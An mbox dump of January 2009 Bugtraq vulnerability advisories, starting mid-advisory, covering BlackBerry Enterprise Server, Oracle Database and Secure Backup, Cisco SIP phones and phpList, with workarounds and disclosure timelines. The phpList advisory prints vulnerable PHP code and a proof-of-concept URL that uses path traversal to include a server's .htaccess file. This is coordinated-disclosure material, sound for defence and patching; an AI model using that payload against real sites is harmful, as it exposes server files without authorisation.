   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbQDzbjs6HoxIfBkRAhnAAKDZYptCie3tSrK5m9G5753o7SnDAQCfW6Xb
G4mUm1dDbfiyJcdW3Aq6CvI=7Ilu
-----END PGP SIGNATURE-----

From - Tue Jan 13 17:22:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058b5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39156-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3FD62EC132
for <lists@securityspace.com>; Tue, 13 Jan 2009 17:20:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CE3C1237232; Tue, 13 Jan 2009 14:45:27 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14488 invoked from network); 13 Jan 2009 21:13:25 -0000
Message-ID: <496D08F6.7050700@idefense.com>
Date: Tue, 13 Jan 2009 16:34:46 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller Uninitialized Memory Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of an uninitialized memory vulnerability in Research
In Motion Ltd.'s BlackBerry Enterprise Server could allow an attacker to
execute arbitrary code with the privileges of the affected service,
which is usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. Due to a logic error, it is possible to allocate an array of
object pointers that is never initialized. This array is located on the
heap. When the object that contains this array is destroyed, each
pointer in the array is deleted. Since the memory is never properly
initialized, whatever content was previously there is used. It is
possible to control the chunk of memory that gets allocated for this
array, which can lead to attacker-controlled values being used as
object pointers. This results in the execution of arbitrary code when
these pointers are deleted.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must email an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

Labs testing has demonstrated that this vulnerability is highly
exploitable. It is possible to layout the heap in such a way that a
previously allocated chunk of fully controllable memory is reused for
the uninitialized memory clock. Code execution is then gained when this
memory is used as an array of object pointers.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbQj2bjs6HoxIfBkRAvk8AKCXLr3nL6/AP++XM17670BnSZdzxgCg/dQg
gB68kHgJzbwjHNQ0i/rIQDo�t+
-----END PGP SIGNATURE-----

From - Wed Jan 14 11:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058cf
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39158-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BA6F2EC119
for <lists@securityspace.com>; Wed, 14 Jan 2009 11:40:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B23862371DF; Wed, 14 Jan 2009 09:12:20 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18033 invoked from network); 13 Jan 2009 22:14:56 -0000
Message-ID: <496D1762.8090707@idefense.com>
Date: Tue, 13 Jan 2009 17:36:18 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary
 Advisor Arbitrary File Rewrite Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

Oracle Database Server is a family of database products that range from
personal databases to enterprise solutions. Further information is
available at the following URL:

http://www.oracle.com/database/index.html

II. DESCRIPTION

Local exploitation of an arbitrary file rewrite vulnerability in Oracle
Corp.'s Oracle Database 10g Release 2 database product allows attackers
to gain elevated privileges.

The vulnerability exists in a function that allows a user with an
authenticated session to create any file or rewrite any files to which
the database account has access.

III. ANALYSIS

Successful exploitation allows the attacker to gain database account
privilege. On Linux and Unix systems the database account is usually
'oracle' while on Windows systems it is the 'SYSTEM' account. To
exploit this vulnerability, the attacker must create a session and
execute the privileged procedure.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Oracle
Database 10g Release 2 version 10.2.0.3.0 on 32-bit Linux platform and
Windows platform. Previous versions may also be affected. Oracle
Database 11g Release 1 version 11.1.0.6.0 is not affected by this
vulnerability.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3997 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/24/2008  - Initial Vendor Notification
03/25/2008  - Initial Vendor Response
11/24/2008  - Status update from Vendor
01/12/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Code Audit Labs
(http://vulnhunt.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbRdibjs6HoxIfBkRAv6CAKCa1cUtfi1arGPT0w1RpxOtRC2UNQCfaB0N
tk0EnS1YCSDeA7xSxi6Xs5w=NyBd
-----END PGP SIGNATURE-----

From - Wed Jan 14 11:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39173-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 0A0BFEC14C
for <lists@securityspace.com>; Wed, 14 Jan 2009 11:44:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 726B3143A6C; Wed, 14 Jan 2009 09:33:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31869 invoked from network); 14 Jan 2009 12:05:37 -0000
Message-ID: <496DDAAC.8070605@orange-ftgroup.com>
Date: Wed, 14 Jan 2009 13:29:32 +0100
From: Laurent Butti <laurent.butti@orange-ftgroup.com>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 14 Jan 2009 12:29:21.0597 (UTC) FILETIME=[BA393ED0:01C97643]
Status:   

Title:
------
* Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability

Summary:
--------
* The Cisco Unified IP Phone 7960G and 7940G (SIP) do not correctly
parse some malformed RTP headers leading to a deterministic denial of
service

Assigned CVE:
-------------
* CVE-2008-4444

Details:
--------
* SIP protocol is used to set up calls between phones. Once the call is
established, the media content is carried by the RTP protocol. A remote
attacker could send a specially crafted RTP packet against a Cisco SIP
phone in such a way as to cause the phone to reboot.

Attack Impact:
--------------
* Denial-of-service (reboot or hang-up) and possibly remote arbitrary
code execution

Attack Vector:
--------------
* Have the possibility to setup a call to the targeted phone and carry
RTP frame to the vulnerable device
* Have access to the VoIP network while a call is established and inject
RTP frames

Timeline:
---------
* 2008-06-13 - Vulnerability reported to Cisco
* 2008-06-16 - Full details sent to Cisco
* 2008-10-21 - Cisco released a patched firmware
* 2009-01-14 - Release of this security advisory

Affected Products:
------------------
* Cisco Unified IP Phone 7960G and 7940G (SIP) with P0S3-08-9-00
firmware. Cisco released a patched firmware on October 21, 2008 which is
described in the bug identifier CSCsu22285 (Cisco Unified IP Phone 7960G
and 7940G (SIP) Release Notes for Firmware Release 8.10).

Credits:
--------
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange

From - Wed Jan 14 12:02:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39159-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 53E85EC14C
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:02:12 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3C74F237017; Wed, 14 Jan 2009 09:15:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18819 invoked from network); 13 Jan 2009 22:44:19 -0000
Message-ID: <496D1E43.8000603@idefense.com>
Date: Tue, 13 Jan 2009 18:05:39 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Corp.'s Secure Backup is a tape backup management software, for
more information, please visit following website:
http://www.oracle.com/technology/products/secure-backup/index.html

II. DESCRIPTION

Remote exploitation of two command injection vulnerabilities in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

In both cases, the vulnerabilities exist in PHP scripts that
authenticate a user attempting to use the service.

The first vulnerability is in "php/login.php". By making a login request
with a specially crafted cookie value, an attacker can execute arbitrary
code on the server.

The second vulnerability is in "php/common.php". This function is called
from the "login.php" page. A variable is used to specify a command to be
run. An attacker can supply any shell command for this variable and it
will be executed in the context of the web server process.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary shell commands in
the context of the web server process. Under Windows, the
Administration Server runs as SYSTEM, so the injected command will be
executed as SYSTEM. Under Linux it runs as an unprivileged user. No
authentication is required to exploit this vulnerability.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.2.0.2 for Linux, and Secure
Backup version 10.2.0.2 for Windows have been confirmed vulnerable.
Other versions and other platforms may also be affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4006 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

07/18/2008  Initial Vendor Notification
07/30/2008  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbR5Dbjs6HoxIfBkRAiqHAKDxgxrDdjVEkqbYmee6NGCIeoKOLACgtl24
BAfUScwWY6Jz5DBquOL3cbE=MpPP
-----END PGP SIGNATURE-----

From - Wed Jan 14 12:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39170-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A3286EC14C
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:04:04 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 4125C143864; Wed, 14 Jan 2009 09:32:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28934 invoked from network); 14 Jan 2009 08:33:05 -0000
Message-ID: <20090114122017.xs71y1geowgkkco0@mail.amnpardaz.com>
Date: Wed, 14 Jan 2009 12:20:17 +0330
From: admin@bugreport.ir
To: bugtraq@securityfocus.com
Subject: phpList <= 2.10.8 Local File inclusion
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
Status:   

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: phpList Local File inclusion
# Vendor: http://www.phplist.com
# Bug: Local File Inclusion
# Vulnerable Version: 2.10.8 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_60.htm
###################################################################


####################
- Description:
####################

Quote From vendor:"phplist is an open-source newsletter manager.  
phplist is free to download, install and use, and is easy to integrate  
with any website.
phplist is downloaded more than 10 000 times per month and is listed  
in the top open source projects for vitality score on Freshmeat.
phplist is sponsored by tincan."


####################
- Vulnerability:
####################

+--> Local File Inclusion

Because of the vulnerability in "admin/index.php", When  
"register_globals" is disabled (Default PHP Configuration) It is  
possible for remote attackers to
include arbitrary files from local resources before performing authentication.

Code Snippet:
/lists/admin.php #line:10-18

if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
   # fix register globals, for now, should be phased out gradually
   # sure, this gets around the entire reason that  
regLANGUAGE_SWITCHister globals
   # should be off, but going through three years of code takes a long time....

   foreach ($_REQUEST as $key => $val) {
     $$key = $val;
   }
}

/lists/admin.php #line:41-56

if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
   print '<!-- using '.$_SERVER["ConfigFile"].'-->'."\n";
   include $_SERVER["ConfigFile"];
} elseif (isset($cline["c"]) && is_file($cline["c"])) {
   print '<!-- using '.$cline["c"].' -->'."\n";
   include $cline["c"];
} elseif (isset($_ENV["CONFIG"]) && is_file($_ENV["CONFIG"])) {
#  print '<!-- using '.$_ENV["CONFIG"].'-->'."\n";
   include $_ENV["CONFIG"];
} elseif (is_file("../config/config.php")) {
   print '<!-- using ../config/config.php -->'."\n";
   include "../config/config.php";
} else {
   print "Error, cannot find config file\n";
   exit;
}

####################
- POC:
####################

http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess

####################
- Credit:
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

From - Wed Jan 14 12:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39160-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 68E38EC0B1
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:12:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4EEC423727C; Wed, 14 Jan 2009 09:15:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19470 invoked from network); 13 Jan 2009 23:14:58 -0000
Message-ID: <496D256A.5090502@idefense.com>
Date: Tue, 13 Jan 2009 18:36:10 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Secure Backup is a network backup system for Oracle Databases.
For more information, see:

http://www.oracle.com/database/secure-backup.html

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

The vulnerability is in a function of common.php which is called from
the login.php page. The script fails to sanitize the input when
verifying the user has permission to use the service.

III. ANALYSIS

Successful exploitation allows an attacker to gain complete control over
an affected system. Because the the Administration Server runs as an
unprivileged user, commands will be executed as that user. Under the
Linux (and possibly other) installations many files are installed world
writable. These include the configuration file for the Apache web-server
that the Administration Server is built on. This server starts as the
root user and changes to a user specified by the configuration files.
Since these files are writable by the user it may be possible for them
to gain access to the root user account. Other configuration and
executable files are also able to be changed.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.1.0.3 for Linux has been
confirmed vulnerable. Other versions and other platforms may also be
affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers Remove write
access for 'other' users to all files. The following command will
recursively change the permissions to remove write permission to
'other'.

chmod -R o-w directory/

This may prevent some aspects of the system from functioning correctly.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
